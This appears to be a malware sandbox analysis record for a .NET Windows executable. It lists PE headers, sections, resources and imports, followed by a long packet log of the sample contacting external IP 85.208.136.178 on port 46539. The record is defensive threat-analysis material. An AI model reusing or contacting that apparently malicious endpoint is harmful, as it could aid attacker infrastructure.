Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x26ffc	0x4a	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x28000	0x2faa4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x58000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x2504c	0x25200	False	0.8109743265993266	data	7.585773646811085	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x28000	0x2faa4	0x2fc00	False	0.08600908049738219	data	2.4474216242910125	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x58000	0xc	0x200	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x280b4	0x13ca	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON	0x294a2	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584
RT_ICON	0x39cee	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016
RT_ICON	0x431ba	0x67e8	Device independent bitmap graphic, 80 x 160 x 32, image size 26560
RT_ICON	0x499c6	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600
RT_ICON	0x4ee72	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896
RT_ICON	0x530be	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600
RT_ICON	0x5568a	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224
RT_ICON	0x56756	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400
RT_ICON	0x57102	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088
RT_GROUP_ICON	0x575b8	0x92	data
RT_VERSION	0x57686	0x1f8	data	English	United States
RT_MANIFEST	0x578ba	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 30, 2022 00:07:25.722348928 CET	49685	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:07:25.752378941 CET	46539	49685	85.208.136.178	192.168.2.3
Nov 30, 2022 00:07:25.752796888 CET	49685	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:07:26.016802073 CET	49685	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:07:26.088752985 CET	46539	49685	85.208.136.178	192.168.2.3
Nov 30, 2022 00:07:26.213782072 CET	46539	49685	85.208.136.178	192.168.2.3
Nov 30, 2022 00:07:26.218960047 CET	49685	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:07:26.290599108 CET	46539	49685	85.208.136.178	192.168.2.3
Nov 30, 2022 00:07:26.380656004 CET	46539	49685	85.208.136.178	192.168.2.3
Nov 30, 2022 00:07:26.424237013 CET	49685	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:07:34.937004089 CET	49685	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:07:34.972991943 CET	46539	49685	85.208.136.178	192.168.2.3
Nov 30, 2022 00:07:35.004894972 CET	49685	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:07:35.055725098 CET	46539	49685	85.208.136.178	192.168.2.3
Nov 30, 2022 00:07:35.055794954 CET	46539	49685	85.208.136.178	192.168.2.3
Nov 30, 2022 00:07:35.055846930 CET	46539	49685	85.208.136.178	192.168.2.3
Nov 30, 2022 00:07:35.055901051 CET	46539	49685	85.208.136.178	192.168.2.3
Nov 30, 2022 00:07:35.056029081 CET	49685	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:07:35.056374073 CET	49685	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:07.861217022 CET	49685	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:07.890326023 CET	46539	49685	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:07.890465021 CET	49685	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.012422085 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.040680885 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.040882111 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.051173925 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.118521929 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.179694891 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.181700945 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.210653067 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.212898016 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.242925882 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.243597984 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.243987083 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.272692919 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.272722960 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.273192883 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.273495913 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.273772001 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.274296045 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.300961971 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.301352024 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.301760912 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.301800013 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.302026987 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.302115917 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.302129030 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.302516937 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.302608967 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.302635908 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.302661896 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.302783012 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.304261923 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.329659939 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.329730988 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.329937935 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.330197096 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.330393076 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.330487013 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.331543922 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.331660986 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.331897974 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.332432032 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.332724094 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.333273888 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.333509922 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.333692074 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.333694935 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.333961010 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.334039927 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.334115982 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.335695982 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.335901022 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.357816935 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.358990908 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.359028101 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.359174967 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.359221935 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.359349966 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.359509945 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.359599113 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.359643936 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.359833002 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.360557079 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.361654997 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.361905098 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.362641096 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.362689018 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.362763882 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.363637924 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.364617109 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.365525007 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.365761995 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.365890026 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.365921021 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.365948915 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.365995884 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.366144896 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.366528034 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.367007971 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.367528915 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.367791891 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.387594938 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.388499975 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.389513969 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.390594006 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.391725063 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.392486095 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.393584013 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.394597054 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.395559072 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.396579981 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.397608995 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.398592949 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.400310040 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.400779963 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.401525021 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.426443100 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.426474094 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.426843882 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.427418947 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.427598953 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.454690933 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.455617905 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.456527948 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.457520008 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.495439053 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.495774031 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.496046066 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.524487972 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.524530888 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.526654005 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.526913881 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.526961088 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.526988983 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.527017117 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.527168036 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.527272940 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.527353048 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.527571917 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.527697086 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.527833939 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.527940035 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.528070927 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.528187990 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.528187990 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.552392960 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.552742958 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.554399014 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.554419994 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.554452896 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.554748058 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.555562019 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.556437969 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.556816101 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.557429075 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.558517933 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.558949947 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.559442043 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.560437918 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.560764074 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.561438084 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.561661005 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:08.562467098 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.563352108 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.564543962 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.565587997 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.566427946 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.568458080 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.569574118 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.578516006 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.583189011 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.584547043 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.585625887 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.585835934 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.586098909 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.586661100 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.587007046 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.587027073 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.588452101 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.589447975 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.590449095 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.632512093 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.652580976 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.713120937 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.713145018 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.715363026 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.716440916 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.739548922 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.739588022 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.741117954 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.829467058 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.864692926 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.864749908 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.864775896 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.864800930 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.864828110 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.864852905 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:08.866043091 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:09.644581079 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:09.644618988 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:09.993891001 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:10.000479937 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:10.000648022 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:10.000782967 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:10.000804901 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:10.001079082 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:10.002705097 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:10.002805948 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:10.002825975 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:10.002842903 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:10.002859116 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:10.213998079 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:10.256093025 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:10.908248901 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:10.936352015 CET	46539	49687	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:10.936508894 CET	49687	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:11.091849089 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:11.120538950 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:11.120707035 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:11.122320890 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:11.187195063 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:11.196537971 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:11.227025986 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:11.227364063 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:11.256616116 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:11.256922960 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:11.257606983 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:11.257709026 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:11.285412073 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:11.285681009 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:11.286668062 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:11.286895990 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:11.287868023 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:11.288023949 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:11.309477091 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:11.311420918 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:11.311469078 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:11.311568975 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:11.317779064 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:11.318135977 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:11.325855970 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:11.326117039 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:11.348048925 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:11.348274946 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:11.349504948 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:11.349706888 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:11.350840092 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:11.350996017 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:11.351665974 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:11.351819038 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:11.355901003 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:11.356115103 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:11.358912945 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:11.359019995 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:11.379221916 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:11.380438089 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:11.381033897 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:11.382400990 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:11.385426044 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:12.952426910 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:12.952848911 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:12.984060049 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:12.984119892 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.002226114 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.002279997 CET	46539	49688	85.208.136.178	192.168.2.3
Nov 30, 2022 00:08:13.002420902 CET	49688	46539	192.168.2.3	85.208.136.178
Nov 30, 2022 00:08:13.002521992 CET	49688	46539	192.168.2.3	85.208.136.178
